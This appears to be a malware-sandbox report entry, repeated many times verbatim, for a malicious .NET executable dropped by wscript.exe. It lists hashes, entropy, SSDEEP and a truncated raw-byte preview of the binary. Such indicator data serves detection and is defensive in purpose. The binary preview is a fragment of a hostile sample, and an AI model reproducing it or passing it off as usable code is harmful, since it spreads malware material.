                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
                          SHA-512:9EA2F9E0E81B69895023DA6A5E6F4850BDFB0E37D847A6086AFAA3DEBB928673276FA149B2E8DF154F6B0498191E5E7AB29C22BC415A761038435ABCC4607CEE
                          Malicious:true
                          Reputation:unknown
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....6.Y.........."...0..J..........Vh... ........@.. ....................................`..................................h..O...................................`g............................................... ............... ..H............text...\H... ...J.................. ..`.rsrc................L..............@..@.reloc...............R..............@..B................8h......H.......|%..l............8..x............................................0..T.........}.....(.......(...... .....(.......{....o....o.......{....o....(......{....o.....*..*".(.....*.0..+.........,..{.......+....,...{....o........(.....*..0............s....}.........(....s......s ...}.....s ...}.....s!...}.....s!...}......{....s"...}.....{....o#.....{....o#.....($.....{......s%...o&.....{....r...po'.....{.... J... ....s(...o).....{.....o*.....{.....o+.....{.....r...po,...t,...o
                          Process:C:\Windows\System32\wscript.exe
                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                          Category:dropped
                          Size (bytes):21504
                          Entropy (8bit):6.8939502624236235
                          Encrypted:false
                          SSDEEP:384:rknCoWESfT1upFgb1XYA1uokwqwADNeODVS/GbLjHulxcu9gbUW91i:0psYAJgtHulWWA
                          MD5:7999F942FF7190CB7C9F0E04D6DC3D41
                          SHA1:66C3743D7A3D0885A624600ABD71486C63A52904
                          SHA-256:8C52BA6DF441FEA41E87285A7A79E790773407B4D377730B4F834B067D355776
